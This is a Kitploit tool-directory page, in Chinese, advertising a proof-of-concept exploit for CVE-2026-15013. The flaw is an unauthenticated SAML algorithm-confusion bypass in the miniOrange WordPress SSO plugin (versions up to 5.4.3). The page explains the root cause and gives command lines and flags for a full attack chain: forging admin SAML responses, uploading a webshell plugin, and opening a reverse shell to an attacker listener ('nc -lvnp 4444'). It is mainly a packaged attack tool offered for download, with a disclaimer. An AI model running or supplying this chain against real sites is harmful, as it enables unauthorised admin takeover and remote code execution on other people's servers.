Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-15013 — CVE-2026-15013 漏洞利用:通过算法混淆在未认证状态下绕过 SAML 认证。伪造 SAML 响应以获取管理员访问权限并部署 webshell/反弹 shell。仅供授权测试。 | Kitploit
工具/GitHubGitHub/zer0dayf/cve-2026-15013
身份验证与授权权限提升Payload生成Web应用程序漏洞利用后渗透利用Web安全渗透测试红队远程访问工具
GitHubzer0dayf/cve-2026-15013

CVE-2026-15013

CVE-2026-15013 漏洞利用:通过算法混淆在未认证状态下绕过 SAML 认证。伪造 SAML 响应以获取管理员访问权限并部署 webshell/反弹 shell。仅供授权测试。

124天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-15013 — miniOrange SAML SSO <= 5.4.3 认证绕过 (PoC)

CVE-2026-15013 的概念验证:通过 miniOrange SAML Single Sign On – SSO Login WordPress 插件(版本截至并包括 5.4.3)中的 SAML 签名算法混淆(HMAC-SHA1)实现未认证认证绕过。

仅限授权测试。 仅在你拥有或已获得明确许可的系统上使用此代码。未经授权访问计算机系统是违法的。

Credits

角色
漏洞发现者lhking(在 CVE 记录中被署名)
CVE / CNAWordfence
本仓库独立实验室复现 / PoC 自动化(非原始发现)

CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-15013

根本原因

Mo_SAML_Utilities::mo_saml_cast_key() 信任来自攻击者控制的 SAMLResponse 中的 SignatureMethod 算法。当设置为 HMAC-SHA1 时,插件将 IdP RSA 公钥重新转换为 HMAC 共享密钥,并使用它验证签名。任何能够读取 IdP 证书(通常是公开元数据)的人都可以为任何现有 WordPress 用户(包括管理员)伪造有效断言。

已在 5.4.4+ 中修复(不安全的算法 / HMAC 被拒绝)。

CVSS

9.8 严重 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

要求

  • Python 3.10+
  • openssl CLI(用于从证书提取公钥)
  • 可访问目标 WordPress 站点,并(对于自动密钥获取)可访问 IdP SAML 描述符

安装依赖:

root@kitploit:~
pip install -r requirements.txt

用法

完整链路(枚举、HMAC 登录、管理员、Webshell):

root@kitploit:~
python3 exploit.py -u https://TARGET.example

可选的反向 shell(先启动监听器:nc -lvnp 4444):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444

仅登录(无 shell):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --no-shell

手动覆盖:

root@kitploit:~
python3 exploit.py -u https://TARGET.example \
  --issuer https://idp.example/realms/xxx \
  --nameid admin \
  -k ./idp-pubkey.pem

参数

流程

  1. 检测 WordPress 及插件版本(必须 <= 5.4.3)
  2. 发现 ACS、SP entityID、IdP issuer
  3. 获取 IdP 签名证书(元数据)并派生公钥 PEM(HMAC 密钥)
  4. 枚举 WordPress 用户
  5. 为每个候选用户伪造 HMAC-SHA1 签名的 SAMLResponse
  6. 选择具有 install_plugins 权限的帐户(管理员)
  7. 上传 webshell 插件(exp/shell.php?c=id)
  8. 可选的通过 --lhost 反向 shell

免责声明

本项目仅用于教育和授权安全研究。作者和贡献者不对滥用行为负责。在测试第三方系统之前,务必获得书面许可。原始漏洞已通过负责任披露流程报告;本仓库仅用于学习和防御性验证的复现演示。

参考

  • https://www.cve.org/CVERecord?id=CVE-2026-15013
  • https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201?source=cve
  • 插件修复:miniOrange SAML 5.4.4+

许可证

用于研究用途。不提供任何担保。

下载工具
标志描述
-u, --urlWordPress 基础 URL(必需)
-k, --hmac-keyPEM 公钥或证书文件;若为空,则从 IdP 元数据获取
--issuer覆盖 IdP 颁发者(issuer)
--acs覆盖 ACS URL
--nameid强制指定单个 WordPress 用户名
--lhost / --lport反向 shell 回调(默认端口 4444)
--no-shell获取管理员会话后停止
--no-reverse上传 shell 但不触发反向连接